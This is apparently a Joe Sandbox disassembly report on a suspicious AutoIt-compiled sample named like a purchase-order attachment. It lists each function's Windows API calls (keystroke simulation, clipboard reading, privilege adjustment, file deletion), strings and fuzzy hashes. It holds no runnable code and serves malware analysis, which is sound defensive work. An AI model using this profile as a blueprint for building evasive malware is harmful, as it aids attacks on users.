                        Function 0031F5D0 Relevance: 74.1, APIs: 40, Strings: 2, Instructions: 630windowkeyboardCOMMON
                        Download Yara Rule
                        APIs
                          • Part of subcall function 002CAF7D: GetWindowLongW.USER32(?,000000EB), ref: 002CAF8E
                        • DefDlgProcW.USER32(?,0000004E,?,?,?,?,?,?,?), ref: 0031F64E
                        • SendMessageW.USER32(?,0000130B,00000000,00000000), ref: 0031F6AD
                        • GetWindowLongW.USER32(?,000000F0), ref: 0031F6EA
                        • SendMessageW.USER32(?,0000110A,00000009,00000000), ref: 0031F711
                        • SendMessageW.USER32 ref: 0031F737
                        • _wcsncpy.LIBCMT ref: 0031F7A3
                        • GetKeyState.USER32(00000011), ref: 0031F7C4
                        • GetKeyState.USER32(00000009), ref: 0031F7D1
                        • SendMessageW.USER32(?,0000130B,00000000,00000000), ref: 0031F7E7
                        • GetKeyState.USER32(00000010), ref: 0031F7F1
                        • SendMessageW.USER32(?,0000110A,00000009,00000000), ref: 0031F820
                        • SendMessageW.USER32 ref: 0031F843
                        • SendMessageW.USER32(?,00001030,?,0031DE69), ref: 0031F940
                        • ImageList_SetDragCursorImage.COMCTL32(00000000,00000000,00000000,?,?,?,?), ref: 0031F956
                        • ImageList_BeginDrag.COMCTL32(00000000,000000F8,000000F0), ref: 0031F967
                        • SetCapture.USER32(?), ref: 0031F970
                        • ClientToScreen.USER32(?,?), ref: 0031F9D4
                        • ImageList_DragEnter.COMCTL32(00000000,?,?), ref: 0031F9E0
                        • InvalidateRect.USER32(?,00000000,00000001,?,?,?,?), ref: 0031F9FA
                        • ReleaseCapture.USER32 ref: 0031FA05
                        • GetCursorPos.USER32(?), ref: 0031FA3A
                        • ScreenToClient.USER32(?,?), ref: 0031FA47
                        • SendMessageW.USER32(?,00001012,00000000,?), ref: 0031FAA9
                        • SendMessageW.USER32 ref: 0031FAD3
                        • SendMessageW.USER32(?,00001111,00000000,?), ref: 0031FB12
                        • SendMessageW.USER32 ref: 0031FB3D
                        • SendMessageW.USER32(?,0000110B,00000009,00000000), ref: 0031FB55
                        • SendMessageW.USER32(?,0000110B,00000009,?), ref: 0031FB60
                        • GetCursorPos.USER32(?), ref: 0031FB81
                        • ScreenToClient.USER32(?,?), ref: 0031FB8E
                        • GetParent.USER32(?), ref: 0031FBAA
                        • SendMessageW.USER32(?,00001012,00000000,?), ref: 0031FC10
                        • SendMessageW.USER32 ref: 0031FC40
                        • ClientToScreen.USER32(?,?), ref: 0031FC96
                        • TrackPopupMenuEx.USER32(?,00000000,?,?,?,00000000), ref: 0031FCC2
                        • SendMessageW.USER32(?,00001111,00000000,?), ref: 0031FCEA
                        • SendMessageW.USER32 ref: 0031FD0D
                        • ClientToScreen.USER32(?,?), ref: 0031FD57
                        • TrackPopupMenuEx.USER32(?,00000080,?,?,?,00000000), ref: 0031FD87
                        • GetWindowLongW.USER32(?,000000F0), ref: 0031FE1C
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.1700475414.00000000002B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002B0000, based on PE: true
                        • Associated: 00000000.00000002.1700441669.00000000002B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1700586974.000000000033D000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1700586974.000000000035E000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1700663883.000000000036A000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1700705512.0000000000374000.00000002.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_2b0000_PO 09110124 EXPRESS SYSTEM-SESB24066.jbxd
                        Similarity
                        • API ID: MessageSend$ClientScreen$Image$CursorDragList_LongStateWindow$CaptureMenuPopupTrack$BeginEnterInvalidateParentProcRectRelease_wcsncpy
                        • String ID: @GUI_DRAGID$F
                        • API String ID: 2516578528-4164748364
                        • Opcode ID: ef175da965ccf22cc66078807170e58dffd559d187c79d0c6ae1c83a3b8391f2
                        • Instruction ID: 83f721e470a26535e76e75830dd8d1820f64c669e390166e8e0f15e6f1ef340b
                        • Opcode Fuzzy Hash: ef175da965ccf22cc66078807170e58dffd559d187c79d0c6ae1c83a3b8391f2
                        • Instruction Fuzzy Hash: A232CE71204601AFD72ADF68C884EAABBE9FF4C354F140629F6A9872B1D770DC94CB51
                        Function 0031A8DC Relevance: 60.1, APIs: 33, Strings: 1, Instructions: 574windowCOMMON
                        Download Yara Rule
                        APIs
                        • SendMessageW.USER32(?,00000400,00000000,00000000), ref: 0031AFDB
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.1700475414.00000000002B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002B0000, based on PE: true
                        • Associated: 00000000.00000002.1700441669.00000000002B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1700586974.000000000033D000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1700586974.000000000035E000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1700663883.000000000036A000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1700705512.0000000000374000.00000002.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_2b0000_PO 09110124 EXPRESS SYSTEM-SESB24066.jbxd
                        Similarity
                        • API ID: MessageSend
                        • String ID: %d/%02d/%02d
                        • API String ID: 3850602802-328681919
                        • Opcode ID: 2e9afcf85a46b0798c795cbc596122019d29f80f71e7cecc9f2d54cc57b253ce
                        • Instruction ID: a9cd6a4e4885c86be029e2ddf5a061083849c8362656903537a87444dead1f99
                        • Opcode Fuzzy Hash: 2e9afcf85a46b0798c795cbc596122019d29f80f71e7cecc9f2d54cc57b253ce
                        • Instruction Fuzzy Hash: FA12E2B1501A04AFEB2A8F64DC89FEE7BB8EF49311F114219F519EB2D0DB708981CB11
                        Function 002CF78E Relevance: 43.9, APIs: 24, Strings: 1, Instructions: 130keyboardthreadwindowCOMMON
                        Download Yara Rule
                        APIs
                        • GetForegroundWindow.USER32(00000000,00000000), ref: 002CF796
                        • FindWindowW.USER32(Shell_TrayWnd,00000000), ref: 00324388
                        • IsIconic.USER32(000000FF), ref: 00324391
                        • ShowWindow.USER32(000000FF,00000009), ref: 0032439E
                        • SetForegroundWindow.USER32(000000FF), ref: 003243A8
                        • GetWindowThreadProcessId.USER32(00000000,00000000), ref: 003243BE
                        • GetCurrentThreadId.KERNEL32 ref: 003243C5
                        • GetWindowThreadProcessId.USER32(000000FF,00000000), ref: 003243D1
                        • AttachThreadInput.USER32(000000FF,00000000,00000001), ref: 003243E2
                        • AttachThreadInput.USER32(000000FF,00000000,00000001), ref: 003243EA
                        • AttachThreadInput.USER32(00000000,?,00000001), ref: 003243F2
                        • SetForegroundWindow.USER32(000000FF), ref: 003243F5
                        • MapVirtualKeyW.USER32(00000012,00000000), ref: 0032440A
                        • keybd_event.USER32(00000012,00000000), ref: 00324415
                        • MapVirtualKeyW.USER32(00000012,00000000), ref: 0032441F
                        • keybd_event.USER32(00000012,00000000), ref: 00324424
                        • MapVirtualKeyW.USER32(00000012,00000000), ref: 0032442D
                        • keybd_event.USER32(00000012,00000000), ref: 00324432
                        • MapVirtualKeyW.USER32(00000012,00000000), ref: 0032443C
                        • keybd_event.USER32(00000012,00000000), ref: 00324441
                        • SetForegroundWindow.USER32(000000FF), ref: 00324444
                        • AttachThreadInput.USER32(000000FF,?,00000000), ref: 0032446B
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.1700475414.00000000002B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002B0000, based on PE: true
                        • Associated: 00000000.00000002.1700441669.00000000002B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1700586974.000000000033D000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1700586974.000000000035E000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1700663883.000000000036A000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1700705512.0000000000374000.00000002.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_2b0000_PO 09110124 EXPRESS SYSTEM-SESB24066.jbxd
                        Similarity
                        • API ID: Window$Thread$AttachForegroundInputVirtualkeybd_event$Process$CurrentFindIconicShow
                        • String ID: Shell_TrayWnd
                        • API String ID: 4125248594-2988720461
                        • Opcode ID: e1c885d024f8d10bd9c3718c368e4290114ae2ad3cb99d4cb8469fffefac8812
                        • Instruction ID: 63069e4647dbe97a191b328d718ba19ba6e336ad0750e0a8be210370cf1f4a9b
                        • Opcode Fuzzy Hash: e1c885d024f8d10bd9c3718c368e4290114ae2ad3cb99d4cb8469fffefac8812
                        • Instruction Fuzzy Hash: B7316771A40318BFFB226B71AC8AF7F7E6CEB44B54F114015FA05EA1D1C6B05D51AEA0
                        Function 002BBDF0 Relevance: 37.4, APIs: 12, Strings: 9, Instructions: 643COMMON
                        Download Yara Rule
                        APIs
                          • Part of subcall function 002BCAEE: _memmove.LIBCMT ref: 002BCB2F
                        • GetCurrentDirectoryW.KERNEL32(00000104,?,?,00002000,?,003722E8,?,00000000,?,002B3E2E,?,00000000,?,0034DBF0,00000000,?), ref: 002BBE8B
                        • GetFullPathNameW.KERNEL32(?,00000104,?,?,?,002B3E2E,?,00000000,?,0034DBF0,00000000,?,00000002), ref: 002BBEA7
                        • __wsplitpath.LIBCMT ref: 002BBF19
                          • Part of subcall function 002D297D: __wsplitpath_helper.LIBCMT ref: 002D29BD
                        • _wcscpy.LIBCMT ref: 002BBF31
                        • _wcscat.LIBCMT ref: 002BBF46
                        • SetCurrentDirectoryW.KERNEL32(?), ref: 002BBF56
                        • _wcscpy.LIBCMT ref: 002BC03E
                        • _wcscpy.LIBCMT ref: 002BC1ED
                        • SetCurrentDirectoryW.KERNEL32 ref: 002BC250
                          • Part of subcall function 002D010A: std::exception::exception.LIBCMT ref: 002D013E
                          • Part of subcall function 002D010A: __CxxThrowException@8.LIBCMT ref: 002D0153
                          • Part of subcall function 002BC320: _memmove.LIBCMT ref: 002BC419
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.1700475414.00000000002B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002B0000, based on PE: true
                        • Associated: 00000000.00000002.1700441669.00000000002B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1700586974.000000000033D000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1700586974.000000000035E000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1700663883.000000000036A000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1700705512.0000000000374000.00000002.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_2b0000_PO 09110124 EXPRESS SYSTEM-SESB24066.jbxd
                        Similarity
                        • API ID: CurrentDirectory_wcscpy$_memmove$Exception@8FullNamePathThrow__wsplitpath__wsplitpath_helper_wcscatstd::exception::exception
                        • String ID: #include depth exceeded. Make sure there are no recursive includes$>>>AUTOIT SCRIPT<<<$AU3!$Bad directive syntax error$EA06$Error opening the file$Unterminated string$_$"7
                        • API String ID: 2542276039-1404632439
                        • Opcode ID: 7568a8fb91b93b0e8ddfcd2cc6e3a4f5cf46b332968ef078a47e85110e67ea7c
                        • Instruction ID: ca99c4629d483be72a1c72012d1bd124bc290c754c4bb017f7867533d9dd21d7
                        • Opcode Fuzzy Hash: 7568a8fb91b93b0e8ddfcd2cc6e3a4f5cf46b332968ef078a47e85110e67ea7c
                        • Instruction Fuzzy Hash: 0342B2715283459FD711EF60D881BEBB7E8AF84340F10482EF58597252DB71EA68CF92
                        Function 002EB9F1 Relevance: 35.2, APIs: 17, Strings: 3, Instructions: 223COMMON
                        Download Yara Rule
                        APIs
                          • Part of subcall function 002EBEC3: LookupPrivilegeValueW.ADVAPI32(00000000,00000000,00000004), ref: 002EBF0F
                          • Part of subcall function 002EBEC3: AdjustTokenPrivileges.ADVAPI32(?,00000000,00000000,?,00000000,?), ref: 002EBF3C
                          • Part of subcall function 002EBEC3: GetLastError.KERNEL32 ref: 002EBF49
                        • _memset.LIBCMT ref: 002EBA34
                        • DuplicateTokenEx.ADVAPI32(?,00000000,00000000,00000002,00000001,?,?,?,?,00000001,?,?), ref: 002EBA86
                        • CloseHandle.KERNEL32(?), ref: 002EBA97
                        • OpenWindowStationW.USER32(winsta0,00000000,00060000), ref: 002EBAAE
                        • GetProcessWindowStation.USER32 ref: 002EBAC7
                        • SetProcessWindowStation.USER32(00000000), ref: 002EBAD1
                        • OpenDesktopW.USER32(default,00000000,00000000,00060081), ref: 002EBAEB
                          • Part of subcall function 002EB8B0: AdjustTokenPrivileges.ADVAPI32(?,00000000,?,00000000,00000000,00000000,?,002EB9EC), ref: 002EB8C5
                          • Part of subcall function 002EB8B0: CloseHandle.KERNEL32(?,?,002EB9EC), ref: 002EB8D7
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.1700475414.00000000002B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002B0000, based on PE: true
                        • Associated: 00000000.00000002.1700441669.00000000002B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1700586974.000000000033D000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1700586974.000000000035E000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1700663883.000000000036A000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1700705512.0000000000374000.00000002.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_2b0000_PO 09110124 EXPRESS SYSTEM-SESB24066.jbxd
                        Similarity
                        • API ID: StationTokenWindow$AdjustCloseHandleOpenPrivilegesProcess$DesktopDuplicateErrorLastLookupPrivilegeValue_memset
                        • String ID: $default$winsta0
                        • API String ID: 2063423040-1027155976
                        • Opcode ID: bb4f8226a7da604aa18dca1c54014e8e015dbd769142509dbcf4a477f381edfc
                        • Instruction ID: e8a96279e1e64e42b194709b1f6caadd8a33b5a1979f9527ba46c299c065e94c
                        • Opcode Fuzzy Hash: bb4f8226a7da604aa18dca1c54014e8e015dbd769142509dbcf4a477f381edfc
                        • Instruction Fuzzy Hash: 22817071850289AFDF12DFA5DD85AEF7B78EF08304F54416AF914A6161DB318E24DF20
                        Function 002F6B3F Relevance: 31.7, APIs: 17, Strings: 1, Instructions: 164filestringCOMMON
                        Download Yara Rule
                        APIs
                          • Part of subcall function 002B31B8: GetFullPathNameW.KERNEL32(00000000,00000104,?,?), ref: 002B31DA
                          • Part of subcall function 002F7B9F: __wsplitpath.LIBCMT ref: 002F7BBC
                          • Part of subcall function 002F7B9F: __wsplitpath.LIBCMT ref: 002F7BCF
                          • Part of subcall function 002F7C0C: GetFileAttributesW.KERNEL32(?,002F6A7B), ref: 002F7C0D
                        • _wcscat.LIBCMT ref: 002F6B9D
                        • _wcscat.LIBCMT ref: 002F6BBB
                        • __wsplitpath.LIBCMT ref: 002F6BE2
                        • FindFirstFileW.KERNEL32(?,?), ref: 002F6BF8
                        • _wcscpy.LIBCMT ref: 002F6C57
                        • _wcscat.LIBCMT ref: 002F6C6A
                        • _wcscat.LIBCMT ref: 002F6C7D
                        • lstrcmpiW.KERNEL32(?,?), ref: 002F6CAB
                        • DeleteFileW.KERNEL32(?), ref: 002F6CBC
                        • MoveFileW.KERNEL32(?,?), ref: 002F6CDB
                        • MoveFileW.KERNEL32(?,?), ref: 002F6CEA
                        • CopyFileW.KERNEL32(?,?,00000000), ref: 002F6CFF
                        • DeleteFileW.KERNEL32(?), ref: 002F6D10
                        • FindNextFileW.KERNEL32(00000000,00000010), ref: 002F6D37
                        • FindClose.KERNEL32(00000000), ref: 002F6D53
                        • FindClose.KERNEL32(00000000), ref: 002F6D61
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.1700475414.00000000002B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002B0000, based on PE: true
                        • Associated: 00000000.00000002.1700441669.00000000002B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1700586974.000000000033D000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1700586974.000000000035E000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1700663883.000000000036A000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1700705512.0000000000374000.00000002.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_2b0000_PO 09110124 EXPRESS SYSTEM-SESB24066.jbxd
                        Similarity
                        • API ID: File$Find_wcscat$__wsplitpath$CloseDeleteMove$AttributesCopyFirstFullNameNextPath_wcscpylstrcmpi
                        • String ID: \*.*
                        • API String ID: 1867810238-1173974218
                        • Opcode ID: a338fa9ed88329cb582b1345cbafcb0b7a74ba578b663ea4a9f95af408f8e675
                        • Instruction ID: 72574f1cee43144e5c3c23175ad9c3ae9236ced6d464ca7954e73eab57e13939
                        • Opcode Fuzzy Hash: a338fa9ed88329cb582b1345cbafcb0b7a74ba578b663ea4a9f95af408f8e675
                        • Instruction Fuzzy Hash: FC51617291411CAACF21DBA0DC88EEEB77CAF09344F0445E6E649E3141EB359B98CF61
                        Function 00307099 Relevance: 30.2, APIs: 20, Instructions: 167clipboardCOMMON
                        Download Yara Rule
                        APIs
                        • OpenClipboard.USER32(0034DBF0), ref: 003070C3
                        • IsClipboardFormatAvailable.USER32(0000000D), ref: 003070D1
                        • GetClipboardData.USER32(0000000D), ref: 003070D9
                        • CloseClipboard.USER32 ref: 003070E5
                        • GlobalLock.KERNEL32(00000000), ref: 00307101
                        • CloseClipboard.USER32 ref: 0030710B
                        • GlobalUnlock.KERNEL32(00000000), ref: 00307120
                        • IsClipboardFormatAvailable.USER32(00000001), ref: 0030712D
                        • GetClipboardData.USER32(00000001), ref: 00307135
                        • GlobalLock.KERNEL32(00000000), ref: 00307142
                        • GlobalUnlock.KERNEL32(00000000), ref: 00307176
                        • CloseClipboard.USER32 ref: 00307283
                        Memory Dump Source
                        • Source File: 00000000.00000002.1700475414.00000000002B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002B0000, based on PE: true
                        • Associated: 00000000.00000002.1700441669.00000000002B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1700586974.000000000033D000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1700586974.000000000035E000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1700663883.000000000036A000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1700705512.0000000000374000.00000002.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_2b0000_PO 09110124 EXPRESS SYSTEM-SESB24066.jbxd
                        Similarity
                        • API ID: Clipboard$Global$Close$AvailableDataFormatLockUnlock$Open
                        • String ID:
                        • API String ID: 3222323430-0
                        • Opcode ID: 3cc66a3a2fe05ea2c4ad79b9ea941313292ddc304bf6d20b4cdf7bad31b43823
                        • Instruction ID: 67c042a0ceaf919a65bcb0543ce3f4a2f1fc4b6ea481d709eca29574becb5455
                        • Opcode Fuzzy Hash: 3cc66a3a2fe05ea2c4ad79b9ea941313292ddc304bf6d20b4cdf7bad31b43823
                        • Instruction Fuzzy Hash: 9A51D171208201ABD312EF64ECA6FAF77ACAF84B40F010919F556D71D1DF70E8058B62
                        Function 002FFDD2 Relevance: 28.3, APIs: 13, Strings: 3, Instructions: 278timefileCOMMON
                        Download Yara Rule
                        APIs
                        • FindFirstFileW.KERNEL32(?,?), ref: 002FFE03
                        • FindClose.KERNEL32(00000000), ref: 002FFE57
                        • FileTimeToLocalFileTime.KERNEL32(?,?), ref: 002FFE7C
                        • FileTimeToLocalFileTime.KERNEL32(?,?), ref: 002FFE93
                        • FileTimeToSystemTime.KERNEL32(?,?), ref: 002FFEBA
                        • __swprintf.LIBCMT ref: 002FFF06
                        • __swprintf.LIBCMT ref: 002FFF3F
                          • Part of subcall function 002BCAEE: _memmove.LIBCMT ref: 002BCB2F
                        • __swprintf.LIBCMT ref: 002FFF93
                          • Part of subcall function 002D234B: __woutput_l.LIBCMT ref: 002D23A4
                        • __swprintf.LIBCMT ref: 002FFFE1
                        • __swprintf.LIBCMT ref: 00300030
                        • __swprintf.LIBCMT ref: 0030007F
                        • __swprintf.LIBCMT ref: 003000CE
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.1700475414.00000000002B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002B0000, based on PE: true
                        • Associated: 00000000.00000002.1700441669.00000000002B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1700586974.000000000033D000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1700586974.000000000035E000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1700663883.000000000036A000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1700705512.0000000000374000.00000002.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_2b0000_PO 09110124 EXPRESS SYSTEM-SESB24066.jbxd
                        Similarity
                        • API ID: __swprintf$FileTime$FindLocal$CloseFirstSystem__woutput_l_memmove
                        • String ID: %02d$%4d$%4d%02d%02d%02d%02d%02d
                        • API String ID: 108614129-2428617273
                        • Opcode ID: bd7e9a86541cc904bdaab3d03a2bcb65d1a5b66920404fc9181347293995f8bb
                        • Instruction ID: 9b26ccbba08f9bf8c5f371149c0a0d8949f372e20c7d072b193d56ba2f60acd7
                        • Opcode Fuzzy Hash: bd7e9a86541cc904bdaab3d03a2bcb65d1a5b66920404fc9181347293995f8bb
                        • Instruction Fuzzy Hash: 34A152B1428344ABC355EFA4CC81EAFB7ECAF94740F44095DF585C6191EB34EA19CB62
                        Function 00302044 Relevance: 28.1, APIs: 15, Strings: 1, Instructions: 118fileCOMMON
                        Download Yara Rule
                        APIs
                        • FindFirstFileW.KERNEL32(?,?,74DE8FB0,?,00000000), ref: 00302065
                        • _wcscmp.LIBCMT ref: 0030207A
                        • _wcscmp.LIBCMT ref: 00302091
                        • GetFileAttributesW.KERNEL32(?), ref: 003020A3
                        • SetFileAttributesW.KERNEL32(?,?), ref: 003020BD
                        • FindNextFileW.KERNEL32(00000000,?), ref: 003020D5
                        • FindClose.KERNEL32(00000000), ref: 003020E0
                        • FindFirstFileW.KERNEL32(*.*,?), ref: 003020FC
                        • _wcscmp.LIBCMT ref: 00302123
                        • _wcscmp.LIBCMT ref: 0030213A
                        • SetCurrentDirectoryW.KERNEL32(?), ref: 0030214C
                        • SetCurrentDirectoryW.KERNEL32(00363A68), ref: 0030216A
                        • FindNextFileW.KERNEL32(00000000,00000010), ref: 00302174
                        • FindClose.KERNEL32(00000000), ref: 00302181
                        • FindClose.KERNEL32(00000000), ref: 00302191
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.1700475414.00000000002B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002B0000, based on PE: true
                        • Associated: 00000000.00000002.1700441669.00000000002B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1700586974.000000000033D000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1700586974.000000000035E000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1700663883.000000000036A000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1700705512.0000000000374000.00000002.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_2b0000_PO 09110124 EXPRESS SYSTEM-SESB24066.jbxd
                        Similarity
                        • API ID: Find$File$_wcscmp$Close$AttributesCurrentDirectoryFirstNext
                        • String ID: *.*
                        • API String ID: 1803514871-438819550
                        • Opcode ID: 7e3ec5526a09ad877518a7d2ce37f42972878176180db27e189b16e5054a915e
                        • Instruction ID: 535690b33460687518bb4a8e558c1f96830f3ee72e9f9e00381cde3115eaac0d
                        • Opcode Fuzzy Hash: 7e3ec5526a09ad877518a7d2ce37f42972878176180db27e189b16e5054a915e
                        • Instruction Fuzzy Hash: C1319031A02219ABDB26ABB4EC9CADF77AC9F06360F104166F911E21D0DB74DE54CB60
                        Function 0030219F Relevance: 24.6, APIs: 13, Strings: 1, Instructions: 111fileCOMMON
                        Download Yara Rule
                        APIs
                        • FindFirstFileW.KERNEL32(?,?,74DE8FB0,?,00000000), ref: 003021C0
                        • _wcscmp.LIBCMT ref: 003021D5
                        • _wcscmp.LIBCMT ref: 003021EC
                          • Part of subcall function 002F7606: CreateFileW.KERNEL32(?,40000000,00000001,00000000,00000003,02000080,00000000), ref: 002F7621
                        • FindNextFileW.KERNEL32(00000000,?), ref: 0030221B
                        • FindClose.KERNEL32(00000000), ref: 00302226
                        • FindFirstFileW.KERNEL32(*.*,?), ref: 00302242
                        • _wcscmp.LIBCMT ref: 00302269
                        • _wcscmp.LIBCMT ref: 00302280
                        • SetCurrentDirectoryW.KERNEL32(?), ref: 00302292
                        • SetCurrentDirectoryW.KERNEL32(00363A68), ref: 003022B0
                        • FindNextFileW.KERNEL32(00000000,00000010), ref: 003022BA
                        • FindClose.KERNEL32(00000000), ref: 003022C7
                        • FindClose.KERNEL32(00000000), ref: 003022D7
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.1700475414.00000000002B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002B0000, based on PE: true
                        • Associated: 00000000.00000002.1700441669.00000000002B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1700586974.000000000033D000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1700586974.000000000035E000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1700663883.000000000036A000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1700705512.0000000000374000.00000002.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_2b0000_PO 09110124 EXPRESS SYSTEM-SESB24066.jbxd
                        Similarity
                        • API ID: Find$File$_wcscmp$Close$CurrentDirectoryFirstNext$Create
                        • String ID: *.*
                        • API String ID: 1824444939-438819550
                        • Opcode ID: 54b7efb77bd1bedf65f9d11e312fad7985cc93df5ec24482f0e5073851c16d54
                        • Instruction ID: f68966675ad9319b4c388cad1383ff30cdbcccc45a666ba2db64022570e84430
                        • Opcode Fuzzy Hash: 54b7efb77bd1bedf65f9d11e312fad7985cc93df5ec24482f0e5073851c16d54
                        • Instruction Fuzzy Hash: D631C131902219AACF66EBE4EC5CEDE77AC9F15320F214651F810A21D0DB70DF95DB64
                        Function 002B6BBC Relevance: 21.9, APIs: 5, Strings: 7, Instructions: 891COMMON
                        Download Yara Rule
                        APIs
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.1700475414.00000000002B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002B0000, based on PE: true
                        • Associated: 00000000.00000002.1700441669.00000000002B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1700586974.000000000033D000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1700586974.000000000035E000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1700663883.000000000036A000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1700705512.0000000000374000.00000002.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_2b0000_PO 09110124 EXPRESS SYSTEM-SESB24066.jbxd
                        Similarity
                        • API ID: _memmove_memset
                        • String ID: Q\E$[$\$\$\$]$^
                        • API String ID: 3555123492-286096704
                        • Opcode ID: 8b644a53c5cf6d9d3817d05c0cef0e722d61eb63da46a2985a04f9326e59c74e
                        • Instruction ID: 3392d11ee3994b73e55c0490601ce7dc72536bfb695cc4b98143aaa0d22aee93
                        • Opcode Fuzzy Hash: 8b644a53c5cf6d9d3817d05c0cef0e722d61eb63da46a2985a04f9326e59c74e
                        • Instruction Fuzzy Hash: 0472CF71D2421ACBCF29CF98C8946EDBBB1FF44354F2581A9D855AB381D374AE90DB40
                        Function 002EB398 Relevance: 21.2, APIs: 14, Instructions: 178memoryCOMMON
                        Download Yara Rule
                        APIs
                          • Part of subcall function 002EB8E7: GetUserObjectSecurity.USER32(?,?,?,00000000,?), ref: 002EB903
                          • Part of subcall function 002EB8E7: GetLastError.KERNEL32(?,002EB3CB,?,?,?), ref: 002EB90D
                          • Part of subcall function 002EB8E7: GetProcessHeap.KERNEL32(00000008,?,?,002EB3CB,?,?,?), ref: 002EB91C
                          • Part of subcall function 002EB8E7: HeapAlloc.KERNEL32(00000000,?,002EB3CB,?,?,?), ref: 002EB923
